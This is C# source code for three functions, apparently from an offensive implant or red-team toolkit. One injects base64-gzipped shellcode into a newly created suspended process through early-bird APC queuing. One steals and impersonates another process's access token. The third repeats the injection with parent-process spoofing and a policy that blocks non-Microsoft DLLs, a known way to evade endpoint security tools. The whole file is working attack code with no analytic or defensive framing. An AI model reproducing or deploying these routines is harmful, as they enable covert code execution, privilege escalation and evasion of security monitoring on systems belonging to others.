public static string InjectAPC(string[] arguments)
{
string targetProcess = arguments[2].Replace('+', ' ');
byte[] buffer = DecGzip.DecompressGzipped(Convert.FromBase64String(arguments[1]));
IntPtr lpNumberOfBytesWritten = IntPtr.Zero;
IntPtr lpThreadId = IntPtr.Zero;
uint oldProtect = 0;
STARTUPINFOEX si = new STARTUPINFOEX();
flags.PROCESS_INFORMATION pi = new flags.PROCESS_INFORMATION();
var processSecurity = new flags.SECURITY_ATTRIBUTES();
var threadSecurity = new flags.SECURITY_ATTRIBUTES();
processSecurity.nLength = Marshal.SizeOf(processSecurity);
threadSecurity.nLength = Marshal.SizeOf(threadSecurity);
GCHandle handle = GCHandle.Alloc(buffer, GCHandleType.Pinned);
IntPtr pinnedBuffer = handle.AddrOfPinnedObject();
try
{
bool success = Interop.CreateProcess(targetProcess, null, ref processSecurity, ref threadSecurity, false, flags.ProcessCreationFlags.EXTENDED_STARTUPINFO_PRESENT | flags.ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null, ref si, out pi);
IntPtr resultPtr = Interop.VirtualAllocEx(pi.hProcess, IntPtr.Zero, buffer.Length, MEM_COMMIT, PAGE_READWRITE);
IntPtr bytesWritten = IntPtr.Zero;
bool resultBool = Interop.WriteProcessMemory(pi.hProcess, resultPtr, pinnedBuffer, buffer.Length, out bytesWritten);
IntPtr sht = Interop.OpenThread(flags.ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);
resultBool = Interop.VirtualProtectEx(pi.hProcess, resultPtr, buffer.Length, PAGE_EXECUTE_READ, out oldProtect);
IntPtr ptr = Interop.QueueUserAPC(resultPtr, sht, IntPtr.Zero);
IntPtr ThreadHandle = pi.hThread;
Interop.ResumeThread(ThreadHandle);
handle.Free();
}
catch (Exception ex)
{
handle.Free();
Console.WriteLine(ex.Message);
}
return(null);
}
public static string ProcImpersonation(string[] arguments)
{
try
{
int targetId = Int32.Parse(arguments[1]);
IntPtr TokenHandle = IntPtr.Zero;
IntPtr hDuplicateToken = IntPtr.Zero;
var securityAttr = new flags.SECURITY_ATTRIBUTES();
securityAttr.nLength = Marshal.SizeOf(securityAttr);
IntPtr procHandle = Interop.OpenProcess((uint)flags.ProcessAccessRights.All, false, (uint)targetId);
if (Interop.OpenProcessToken(procHandle, TOKEN_ALL_ACCESS, out TokenHandle))
{
Interop.CloseHandle(procHandle);
}
else
{
Console.WriteLine("Failed to pass process handle");
}
if (!Interop.DuplicateTokenEx(TokenHandle, (UInt32)flags.ACCESS_MASK.MAXIMUM_ALLOWED, ref securityAttr, flags.SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, flags.TOKEN_TYPE.TokenImpersonation, out hDuplicateToken))
{
return("Failed to Duplicate Token - Make sure you have administrator privileges");
}
Interop.CloseHandle(TokenHandle);
if (!Interop.ImpersonateLoggedOnUser(hDuplicateToken))
{
Interop.CloseHandle(TokenHandle);
Interop.CloseHandle(hDuplicateToken);
return("Failed to Impersonate Token");
}
Interop.CloseHandle(TokenHandle);
}
catch (Exception ex)
{
return(ex.Message);
}
return("You have successfully steal token from process");
}
public static string InjectAPCPPID(string[] arguments)
{
string targetProcess = arguments[2].Replace('+', ' ');
byte[] buffer = DecGzip.DecompressGzipped(Convert.FromBase64String(arguments[1]));
var blockMitigationPolicy = Marshal.AllocHGlobal(IntPtr.Size);
int parentId = SearchPID.SearchForPPID();
IntPtr lpNumberOfBytesWritten = IntPtr.Zero;
IntPtr lpThreadId = IntPtr.Zero;
uint oldProtect = 0;
var lpValueProc = IntPtr.Zero;
STARTUPINFOEX siEx = new STARTUPINFOEX();
flags.PROCESS_INFORMATION pi = new flags.PROCESS_INFORMATION();
var processSecurity = new flags.SECURITY_ATTRIBUTES();
var threadSecurity = new flags.SECURITY_ATTRIBUTES();
processSecurity.nLength = Marshal.SizeOf(processSecurity);
threadSecurity.nLength = Marshal.SizeOf(threadSecurity);
GCHandle handle = GCHandle.Alloc(buffer, GCHandleType.Pinned);
IntPtr pinnedBuffer = handle.AddrOfPinnedObject();
try
{
var lpSize = IntPtr.Zero;
Interop.InitializeProcThreadAttributeList(IntPtr.Zero, 2, 0, ref lpSize);
siEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);
Interop.InitializeProcThreadAttributeList(siEx.lpAttributeList, 2, 0, ref lpSize);
if (IntPtr.Size == 4)
{
Marshal.WriteIntPtr(blockMitigationPolicy, IntPtr.Zero);
}
else
{
Marshal.WriteIntPtr(blockMitigationPolicy, new IntPtr((long)BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON));
}
Interop.UpdateProcThreadAttribute(siEx.lpAttributeList, 0, (IntPtr)PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, blockMitigationPolicy, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);
var parentHandle = Interop.OpenProcess(flags.ProcessAccessRights.CreateProcess | flags.ProcessAccessRights.DuplicateHandle, false, parentId);
lpValueProc = Marshal.AllocHGlobal(IntPtr.Size);
Marshal.WriteIntPtr(lpValueProc, parentHandle);
Interop.UpdateProcThreadAttribute(siEx.lpAttributeList, 0, (IntPtr)PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValueProc, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);
bool success = Interop.CreateProcess(targetProcess, null, ref processSecurity, ref threadSecurity, false, flags.ProcessCreationFlags.EXTENDED_STARTUPINFO_PRESENT | flags.ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null, ref siEx, out pi);
IntPtr resultPtr = Interop.VirtualAllocEx(pi.hProcess, IntPtr.Zero, buffer.Length, MEM_COMMIT, PAGE_READWRITE);
IntPtr bytesWritten = IntPtr.Zero;
bool resultBool = Interop.WriteProcessMemory(pi.hProcess, resultPtr, pinnedBuffer, buffer.Length, out bytesWritten);
IntPtr sht = Interop.OpenThread(flags.ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);
resultBool = Interop.VirtualProtectEx(pi.hProcess, resultPtr, buffer.Length, PAGE_EXECUTE_READ, out oldProtect);
IntPtr ptr = Interop.QueueUserAPC(resultPtr, sht, IntPtr.Zero);
IntPtr ThreadHandle = pi.hThread;
Interop.ResumeThread(ThreadHandle);
handle.Free();
}
catch (Exception ex)
{
handle.Free();
Console.WriteLine(ex.Message);
}
return(null);
}